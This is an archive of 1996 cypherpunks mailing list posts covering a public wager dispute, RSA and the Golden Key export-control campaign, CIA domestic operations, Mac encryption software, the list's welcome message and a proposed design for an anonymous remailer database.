
I note for the record that your claim, as you originally put it, was quite
clear.

There is no dispute of terms or conditions.  This is an uncomplicated
issue.

If your claim, as written, is correct, I shall pay to you or your
appointed agent US$ 100.

If it is false, you shall pay to me or my appointed agent US$ 100.

The only issue is how you wish to modify that claim for the purposes of
the wager so as to bring it within a semblence of accuracy.

Absent further interest on your part, I consider the matter closed and 
your claim retracted.

> 
> Jim Bell
> jimbell@pacifier.com
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 24 Apr 1996 15:37:08 +0800
To: cypherpunks@toad.com
Subject: Re: PEP Announcement (fwd)
In-Reply-To: <v03006600ada332adbb79@[199.0.65.105]>
Message-ID: <v03006608ada34ee61f5f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


> Hey, Amos!

...and the rest of the planet.

Sorry, folks.

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Apr 1996 17:47:57 +0800
To: cypherpunks@toad.com
Subject: Meta: The Arguing about the Terms of the Wager Continues
Message-ID: <ada312fb050210043275@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:14 AM 4/24/96, jim bell wrote:

>As I recall from a message a day ago, you claimed that you saw no way that
>we could come to any kind of agreement as to the terms and conditions.  I'm
>willing to accept your word on this prediction.

And in another message, Black Unicorn wrote:

>I note for the record that I never predicted that the terms and
>conditions would be complex or unresolved, but that you would alter
>the claim and the logistics of the wager to the point where you might
>evade the consequences of loss.
>
>I note for the record that it was your post that originally supported its
>accuracy with a call for wagering.
>
>I note for the record......

And so the back-and-forth continues...taking up even more list space
arguing, waffling, finessing, rebutting, disputing, and on an on.

Exactly as several of us have predicted.

Give it a rest.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Apr 1996 21:47:16 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Golden Key Campaign
In-Reply-To: <199604232353.QAA13608@jobe.shell.portal.com>
Message-ID: <317DD5D2.6284@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> No, the thing that worries me most is patent infringement.  And the main
> company I worry about is RSA, one of the sponsors of this golden key
> effort.  Note that RSA's logo is a key, and we see the RSA key at the
> bottom of our Netscape screens all the time.  I don't remember if it's
> golden.

  The key at the bottom of the Netscape window is not the RSA logo, and
doesn't even look much like it.  Our key is meant to convey the
absence or presence of encryption via a metaphor that is understandable
to the average home user, not as an advertisement for RSA.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 24 Apr 1996 16:23:40 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Nazis on the Net
Message-ID: <199604240425.AAA06395@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Apr 23, 1996 19:44:00, '"E. ALLEN SMITH"
<EALLENSMITH@ocelot.Rutgers.EDU>' wrote: 
 
[misc. material against holocaust revisionism snipped] 
 
> 
> It would 
>have been better if the atomic bomb had been ready in time to use against 
>Germany and Stalinist Russia. 
>	-Allen 
> 
 
It was ready "in time" to use against "Stalinist Russia" (which, BTW, was
Stalinist "Soviet Union,"). 
 
Both your sense of history and geography continue to be deficient. 
 
--tallpaul 
 
PS: Since T.C. May and others wrote of the atomic bomb being used in the
Pacific theater I see no reason however why E.A. Smith can't discuss the
bomb in Europe. And, when I asked about the cypherpunk relevance to the
Bell/May concern over atomic weapons I was told it was relevant because the
Japanese Purple Code was involved. I infer that the new discussion on
Europe is equally relevant to cypherpunks because of Enigma and VERONA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 24 Apr 1996 19:04:15 +0800
To: cypherpunks@toad.com
Subject: Re: ?
In-Reply-To: <960424032712_381601600@emout19.mail.aol.com>
Message-ID: <Pine.GUL.3.93.960424004054.17306A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996 Buck213@aol.com wrote:

> ?

No! I won't!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Wed, 24 Apr 1996 16:41:06 +0800
To: cypherpunks@toad.com
Subject: "Separate but equal" as a racist doctrine
Message-ID: <199604240441.AAA07568@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


For some considerable period of time the doctrine of "separate but equal"
was one of the major racist theories in the U.S. 
 
People who wish to organize for racist ideology behind this doctrine while
proclaiming they are not racists merely place themselves in the old racist
camp. Their organizing for (and their denials of) racist ideology does not
make them less racist, just less honest. 
 
--tallpaul 
 
PS: Oh yes, for all the other rightwingers on the net who remain silent
when rightwing views are presented but tell those who challenge the
rightwing material to stop posting because it isn't "cypher" relevant:
perhaps we could call the thread something like "Racist Code Talkers" or
"Why Don't 'Americans' Learn History." Both of those seem to have resembled
past on-topic threads.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 24 Apr 1996 16:48:53 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] [Wager: Seeming Resolution]
In-Reply-To: <Pine.SUN.3.93.960423230132.343B-100000@polaris.mindport.net>
Message-ID: <glTPGm200YUu5iTVd2@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 23-Apr-96 [Wager: Seeming
Resolution] by Black Unicorn@schloss.li 
> The only issue is how you wish to modify that claim for the purposes of
> the wager so as to bring it within a semblence of accuracy.
>  
> Absent further interest on your part, I consider the matter closed and 
> your claim retracted.

I confess I had a good laugh at Jim Bell's expense. His attempt at
weaseling was sadly uninspired, and Black Unicorn was quite right to
move in for the kill.

But to be fair to Jim Bell, perhaps $100 is still too high? I mean this
in complete seriousness: I have to come up with nearly $2,000 cash by
this weekend, and I wouldn't be able to make such a wager at this time,
no matter how right I felt I was.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 24 Apr 1996 16:50:22 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: EYE_suk
In-Reply-To: <Pine.SUN.3.93.960423181900.10274B-100000@polaris.mindport.net>
Message-ID: <199604240503.BAA04064@nrk.com>
MIME-Version: 1.0
Content-Type: text


> It was contemplated that the CIA would be limited to foreign intelligence
> operations and conduct very few of its operations in the United States.
> The Agency was specifically permitted to be headquartered in the United
> States and conduct what acts may be necessary to administer that facility.


[Overseas Headquarters brings to mind the French Foreign Legion.]

The Agency does lots of things domestically to support their
'overseas' charter. 

They pay the Skunk Works to design U-2's & Blackbirds.

They run (or did...) a rather large training operation at Camp Perry.

They keep safehouses for defectors; sometimes expensive ones. [There
was a great story in the WSJ a few years back about a white elephant
of one they wanted to sell...]

They have a rather unique warehouse of James Bond-ish gadgets. I
once met the logistics guy who had to account for it all, even when
he had no idea what much of it was!

They have domestic field offices.

(BTW, it's worth wondering what restrictions there'd be if it were
not for an ENORMOUS turf battle between them & Jill Edgar Hoover.)

But they don't even keep their own domestic guard force; that is all
FPS, same as NSA.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 17:02:51 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: EYE_suk
In-Reply-To: <199604240503.BAA04064@nrk.com>
Message-ID: <Pine.SUN.3.93.960424010701.343D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, David Lesher wrote:

[On CIA]

> 
> But they don't even keep their own domestic guard force; that is all
> FPS, same as NSA.

Guard force begins to look like "police powers."

> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Trauring <philip@cs.brandeis.edu>
Date: Wed, 24 Apr 1996 16:39:21 +0800
To: cypherpunks@toad.com
Subject: What's the best Mac crypto program?
In-Reply-To: <199604232059.NAA24322@toad.com>
Message-ID: <v03006601ada3670bb3a8@[129.64.2.182]>
MIME-Version: 1.0
Content-Type: text/plain


What is the best free/shareware program for protecting(and I mean
government-strength encryption) a Mac folder or creating a protected Mac
volume?

Additionally, are any of the commercial products available safer than these
free/shareware ones?

Thanks,
	Philip

          --=--=====--=--=====--=--=====--=--=====--=--=====--=--
                   Philip Trauring      philip@cs.brandeis.edu     617-736-6702
                         "knowledge is my addiction, information is my drug"
                                        http://www.cs.brandeis.edu/~philip/
          --=--=====--=--=====--=--=====--=--=====--=--=====--=--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Wed, 24 Apr 1996 20:40:13 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Golden Key Campaign
In-Reply-To: <199604232353.QAA13608@jobe.shell.portal.com>
Message-ID: <Pine.BSF.3.91.960424014017.535A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> No, the thing that worries me most is patent infringement.  And the main
> company I worry about is RSA, one of the sponsors of this golden key
> effort.  Note that RSA's logo is a key, and we see the RSA key at the
> bottom of our Netscape screens all the time.  I don't remember if it's
> golden.

The logo they have at www.rsa.com is two modern-style keys (like we all 
have on our keychains) fit together at the teeth. The key on the 
"Golden Key Campaign" and on Netscape looks more like an old-style 
thing, a circle on the end of a long bar with two teeth at the end.

I'd say the RSA logo (the one at their web site) looks nothing like the 
one on the envelope.

> They fought against PGP for years until Phil trumped them by going
> over their heads to MIT. 

Yes, but from the previous post, it sounds like PRZ supports this.

> I hate to see that company rewarded when it is acting counter to the
> interests of people who need access to privacy tools.

Financially, RSA *does* have a hell of a lot to gain from relaxed 
export controls. OTOH, I would think that other companies would be able 
to sell RSA-patented encryption, just not to inside the USA (IANAL). Of 
course, that inside-the-USA factor is a very big one.

IMNSHO, relaxed export controls would be much better than the status
quo, even if R$A does have exclusive milking rights to that global cow. 
One company selling crypto, even with a monopoly, is better than no
companies selling crypto. Besides, the patent on public-key crypto won't
last forever. 

I think I'll put the golden key on my web pages, right alongside the
blue ribbon. 


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 24 Apr 1996 18:52:33 +0800
To: hfinney@shell.portal.com (Hal)
Subject: Re: Golden Key Campaign
In-Reply-To: <199604232353.QAA13608@jobe.shell.portal.com>
Message-ID: <199604240707.CAA06398@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I know you feel strongly about this, and I don't expect to change your 
mind.

But sometimes in politics you have to play the angles.  I don't think 
most people care about their civil liberties as much as they should.  If 
it were just a question of censorship and wiretapping, I think we'd 
probably lose the political fight.  Sure we're right.  But that's not 
enough.  We don't have any clout.

But fortunatly big business has come to the conclusion that it's going to
have to kill the crypto parts of ITAR in order to do business overseas. 
And that means the export restrictions are as good as dead.

The other side of the debate has been raising the spectres of the four
horsemen, and that argument has to be addressed, at least nominally.  RSA
can't say, "We know that law enforcement is concerned about terrorism,
drugs, and child pornography.  But we need the rules changed anyway so we
can make buckets of money."

So they say stand on civil liberties.  Yes, it's disingenuous.  But if 
they win, we'll all come out ahead.  In order to make the money, they're 
going to secure our civil liberties.

The patents won't last forever.  They're going to expire, and when they
do, the war will be over, because ITAR's crypto restrictions will be 
dead.

And it will be due, in large part, to the cypherpunks who made corporate 
customers afraid to use 40 bit keys.

Security isn't the only thing that's economics.  So's politics.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 18:52:33 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "You have been deleted"
In-Reply-To: <ada2fe6f030210045e74@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960424030022.343E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, Timothy C. May wrote:

> its route and landed on my hill, abducting me for medical experiments I am
> too embarrassed to describe (except that Chelsea was also involved). I am
> back now, albeit subtly changed (for the better).

That a medical experiment including Chelsea could improve a man is beyond
the bounds of reason.

Mr. May, are you making this up?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 18:38:24 +0800
To: Philip Trauring <philip@cs.brandeis.edu>
Subject: Re: What's the best Mac crypto program?
In-Reply-To: <v03006601ada3670bb3a8@[129.64.2.182]>
Message-ID: <Pine.SUN.3.93.960424031759.343F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Apr 1996, Philip Trauring wrote:

> What is the best free/shareware program for protecting(and I mean
> government-strength encryption) a Mac folder or creating a protected Mac
> volume?

CryptDisk looks pretty secure.

Shareware as I recall.

> 
> Additionally, are any of the commercial products available safer than these
> free/shareware ones?

As far as I know, most commercial encryption for the mac is trash.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Buck213@aol.com
Date: Wed, 24 Apr 1996 18:56:07 +0800
To: cypherpunks@toad.com
Subject: ?
Message-ID: <960424032712_381601600@emout19.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 24 Apr 1996 19:20:45 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: EYE_suk
In-Reply-To: <Pine.SOL.3.91.960423221718.19976A-100000@chivalry>
Message-ID: <Pine.SUN.3.93.960424033150.343G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 23 Apr 1996, Simon Spero wrote:

> On Tue, 23 Apr 1996, Adam Shostack wrote:
> 
> > 	Isn't the CIA forbidden from doing anything on US soil?
> 
> That'd make cointel a little tricky :-) 

The FBI is exclusively responsible for CoIntel within the United States.
The CIA is permitted no CoIntel activities at all in the U.S. excepting
internal investigations which must be turned over to the FBI after organic
review.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Apr 1996 21:48:32 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Watchdog
Message-ID: <2.2.32.19960424103903.00d1f244@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>But other firms are selling snoop software designed for network use.
>Much of it was developed to ensure that workers aren't using pirated
>programs on the job, but it can also be used to analyze every move you
>make on your computer.  And the rise of the Internet has given
>companies a big new reason to track corporate computer use.

Which is why I boot a clean session without network drivers before I do
anything interesting.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Roissetter <J.Roissetter@plymouth.ac.uk>
Date: Wed, 24 Apr 1996 19:44:54 +0800
Subject: No Subject
Message-ID: <1002C5F271A@cs_fs15.csd.plym.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


UNSUBSCRIVE




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: creal <creal@nando.net>
Date: Sun, 28 Apr 1996 17:03:18 +0800
To: private-eye@netcom.com
Subject: Clyink Encryption Units
Message-ID: <Pine.SUN.3.91.960424095738.5217B-100000@bessel.nando.net>
MIME-Version: 1.0
Content-Type: text/plain


Cylink STX-2400X Voice/Data Encryption Units

- Easy hook-up to phone (4-pin modular plug)
- 198 bit key
- Clear/Secure voice/data
- keyed lock
- SEEK key exchange or manual key loading
- User's manual
- ac power supplys

These are the same as the STX 9600X currently sold by Cylink at 
$3000/unit except the data transfer rate is 2400 bps instead of 9600 
bps. Good voice recovery.  Like new condition.

Asking $450.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Fri, 26 Apr 1996 09:38:05 +0800
To: cypher@infinity.nus.sg
Subject: Your Majordomo request results
Message-ID: <199604260125.SAA29797@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Your request of Majordomo was:
>>>> subscribe cypherpunks
Succeeded.
Your request of Majordomo was:
>>>> end
END OF COMMANDS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Majordomo@toad.com
Date: Fri, 26 Apr 1996 09:25:40 +0800
To: cypher@infinity.nus.sg
Subject: Welcome to cypherpunks
Message-ID: <199604260125.SAA29798@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


--

Welcome to the cypherpunks mailing list!

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@toad.com" with the following command
in the body of your email message:

    unsubscribe cypherpunks Cypherpunks Mailing List <cypher@infinity.nus.sg>

Here's the general information for the list you've
subscribed to, in case you don't already have it:



About cypherpunks
-----------------

I. Administrivia (please read, boring though it may be)

The cypherpunks list is a forum for discussing personal defenses for
privacy in the digital domain.  It is a high volume mailing list.  If
you don't know how to do something, like unsubscribe, send mail to

	majordomo@toad.com

and the software robot which answers that address will send you back
instructions on how to do what you want.  If you don't know the
majordomo syntax, an empty message to this address will get you a help
file, as will a command 'help' in the body.  Even with all this
automated help, you may still encounter problems.  If you get really
stuck, please feel free to contact me directly at the address I use
for mailing list management:

	cypherpunks-owner@toad.com

Please use this address for all mailing list management issues.  Hint:
if you try to unsubscribe yourself from a different account than you
signed up for, it likely won't work.  Log back into your old account
and try again.  If you no longer have access to that account, mail me
at the list management address above.  Also, please realize that 
there will be some cypherpunks messages "in transit" to you at the
time you unsubscribe.  If you get a response that says you are unsubscribed,
but the messages keep coming, wait a day and they should stop.

For other questions, my list management address is not the best place,
since I don't read it every day.  To reach me otherwise, send mail to

	eric@remailer.net

This address is appropriate for emergencies (and wanting to get off
the list is never an emergency), such as the list continuously spewing
articles.  Please don't send me mail to my regular mailbox asking to
be removed; I'll just send you back a form letter.

Do not mail to the whole list asking to be removed.  It's rude.  The
-request address is made exactly for this purpose.

To post to the whole list, send mail to

	cypherpunks@toad.com

If your mail bounces repeatedly, you will be removed from the list.
Nothing personal, but I have to look at all the bounce messages.

There is no digest version available.

There is an announcements list which is moderated and has low volume.
Announcements for physical cypherpunks meetings, new software and
important developments will be posted there.  Mail to

	cypherpunks-announce-request@toad.com

if you want to be added or removed to the announce list.  All
announcements also go out to the full cypherpunks list, so there is no
need to subscribe to both.


II. About cypherpunks

The cypherpunks list is not designed for beginners, although they are
welcome.  If you are totally new to crypto, please get and read the
crypto FAQ referenced below.  This document is a good introduction,
although not short.  Crypto is a subtle field and a good understanding
will not come without some study.  Please, as a courtesy to all, do
some reading to make sure that your question is not already frequently
asked.

There are other forums to use on the subject of cryptography.  The
Usenet group sci.crypt deals with technical cryptography; cypherpunks
deals with technical details but slants the discussion toward their
social implications.  The Usenet group talk.politics.crypto, as is
says, is for political theorizing, and cypherpunks gets its share of
that, but cypherpunks is all pro-crypto; the debates on this list are
about how to best get crypto out there.  The Usenet group
alt.security.pgp is a pgp-specific group, and questions about pgp as
such are likely better asked there than here.  Ditto for
alt.security.ripem.

The cypherpunks list has its very own net.loon, a fellow named L.
Detweiler.  The history is too long for here, but he thinks that
cypherpunks are evil incarnate.  If you see a densely worded rant
featuring characteristic words such as "medusa", "pseudospoofing",
"treachery", "poison", or "black lies", it's probably him, no matter
what the From: line says.  The policy is to ignore these postings.
Replies have never, ever, not even once resulted in anything
constructive and usually create huge flamewars on the list.  Please,
please, don't feed the animals.


III. Resources.

A. The sci.crypt FAQ

anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt

The cryptography FAQ is good online intro to crypto.  Very much worth
reading.  Last I looked, it was in ten parts.

B. cypherpunks ftp site

anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks

This site contains code, information, rants, and other miscellany.
There is a glossary there that all new members should download and
read.  Also recommended for all users are Hal Finney's instructions on
how to use the anonymous remailer system; the remailer sources are
there for the perl-literate.

C. Bruce Schneier's _Applied Cryptography_, published by Wiley

This is required reading for any serious technical cypherpunk.  An
excellent overview of the field, it describes many of the basic
algorithms and protocols with their mathematical descriptions.  Some
of the stuff at the edges of the scope of the book is a little
incomplete, so short descriptions in here should lead to library
research for the latest papers, or to the list for the current
thinking.  All in all, a solid and valuable book.  It's even got
the cypherpunks-request address.


IV. Famous last words

My preferred email address for list maintenance topics only is
hughes@toad.com.  All other mail, including emergency mail, should go
to hughes@ah.com, where I read mail much more regularly.

Enjoy and deploy.

Eric

-----------------------------------------------------------------------------

Cypherpunks assume privacy is a good thing and wish there were more
of it.  Cypherpunks acknowledge that those who want privacy must
create it for themselves and not expect governments, corporations, or
other large, faceless organizations to grant them privacy out of
beneficence.  Cypherpunks know that people have been creating their
own privacy for centuries with whispers, envelopes, closed doors, and
couriers.  Cypherpunks do not seek to prevent other people from
speaking about their experiences or their opinions.

The most important means to the defense of privacy is encryption. To
encrypt is to indicate the desire for privacy.  But to encrypt with
weak cryptography is to indicate not too much desire for privacy.
Cypherpunks hope that all people desiring privacy will learn how best
to defend it.

Cypherpunks are therefore devoted to cryptography.  Cypherpunks wish
to learn about it, to teach it, to implement it, and to make more of
it.  Cypherpunks know that cryptographic protocols make social
structures.  Cypherpunks know how to attack a system and how to
defend it.  Cypherpunks know just how hard it is to make good
cryptosystems.

Cypherpunks love to practice.  They love to play with public key
cryptography.  They love to play with anonymous and pseudonymous mail
forwarding and delivery.  They love to play with DC-nets.  They love
to play with secure communications of all kinds.

Cypherpunks write code.  They know that someone has to write code to
defend privacy, and since it's their privacy, they're going to write
it.  Cypherpunks publish their code so that their fellow cypherpunks
may practice and play with it.  Cypherpunks realize that security is
not built in a day and are patient with incremental progress.

Cypherpunks don't care if you don't like the software they write. 
Cypherpunks know that software can't be destroyed.  Cypherpunks know
that a widely dispersed system can't be shut down.

Cypherpunks will make the networks safe for privacy.

[Last updated Mon Feb 21 13:18:25 1994]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 28 Apr 1996 10:55:42 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: An idea for refining penet-style anonymous servers
In-Reply-To: <Uc5fx8m9LojB085yn@netcom.com>
Message-ID: <Pine.LNX.3.92.960425181712.779A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 25 Apr 1996, Alan Bostick wrote:

> My scheme is the design of the address database.  It consists of two
> hash tables, one for sending messages (which maps anonymous IDs onto
> sender's addresses), and one for receiving them (mapping recipient's
> addresses onto anonymous IDs).  A cryptographically secure hash (say,
> MD5) is used for the index of both tables.

Funny.  I had the *exact* same idea a couple of months ago.  However, I
did find several flaws in it.

>
> The index of the sending message table is the MD5 hash of the sender's
> address.  The table entry the index points to is the sender's anonymous
> ID, encrypted by a symmetric algorithm (maybe IDEA).  The encryption key
> would be a different hash, by another algorithm (let's suppose it's
> SHA), of that same address.

Perhaps the address could be hashed several times for the table look-up and
then the address could be hashed a less number of times for decryption with
the IDEA key.  This reduces the amount of code needed and also eliminates
any problems with only using 128 bits of SHA output.

>
> In forwarding a message, the server MD5-hashes the sender's address and
> looks at the table.  If it doesn't find a corresponding entry, it
> creates one.  If it *does* find an entry, it SHA-hashes the sender's
> address and uses this key to decrypt the anonymous ID.  In the unlikely
> event of collision the decrypted ID will be gibberish and the server
> does something sensible (like appending padding to the address and
> trying again).  The header information is filtered and the anonymous ID
> inserted in the From: line.

In the scheme I thought of, a password would be sent with the message, which
would be hashed, appended to the hash of the address, and then hashed again
to get the decryption key.

> There is a way that attackers who have seized or copied the database can
> search it - by trying it out on anonymous IDs, or user addresses, until
> they hit paydirt.  And of course such an anonymous server can be no more
> trustworthy than its operator; and the fundamental security limitations of
> the penet-style anonymous server are well-understood.

Searching for the real address behind a pseudonym is not hard at all.  Just
hash the anonymous address, look it up in the table, then decrypt the
cooresponding encrypted address.  This was the major flaw that I spotted with
this scheme.

>
> So what do people think of this scheme of mine?  Are there drawbacks or
> weaknesses that I'm not seeing?  Is it a good idea?  I'd really like it
> if *something* good came out of being laid up with the flu.

The only other problem I found is a pretty minor one: the address database
would be twice as large as it would be if it was stored in plaintext.  I
don't think that much security is gained by using this scheme.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMX/727Zc+sv5siulAQGbwgP/XfQ2qw4HrzRX/DtFq542EnwnDuE+ACYk
OG3/dlCzqn4mmXNBB1QAh3K7tzNS0Gah46fODI/5lTHRqwyFehFIC96X3L45mEPO
QJWcvu2mqf6KhR5QnanB6jNw+okp1NAvTRJA2QhIZtPBBS3Xm3NfhrtHF8BKdxdu
WqjXM4HMjxs=
=gpZ8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Apr 1996 16:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: coderpunks not elite
Message-ID: <ada588071e021004fa40@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:14 PM 4/25/96, Hal wrote:
>From: tcmay@got.net (Timothy C. May)
>> Well, I was not invited to join the elite and secret coderpunks list, but I
>> still have some thoughts on coding and, especially, on the opportunities
>> offered by Java.
>
>As far as I know, the coderpunks list is neither secret nor elite.  I
>joined it about a month ago, andd there wasn't any problem.  Just send
>mail to majordomo@toad.com saying "subscribe coderpunks".  It's just as
>easy as cypherpunks.

My reference was maybe a tad unfair. It was based on a reading of the hks
archives of the coderpunks archives covering the December 1995 foudning.
The hks archives no longer being available to me, I can't quote the
specific messages, but the secretive and elite nature was discussed in the
first dozen or so messages. Widespread knowledge of this list did not
become available until February.

My conclusion: keeping such a list secret and invitation-only for a couple
of months, until L. Todd Masco let the cat out of the bag by announcing
that hks was archiving it, is not a "cypherpunkish" thing to do. Having a
list oriented toward code is fine, but keeping it elite and secret is a
"cabal"-like thing to do. In my opinion, of course.

>I do share Tim's concern about the political views of coderpunks
>subscribers.  Despite the "punks" in the name it seems to be somewhat
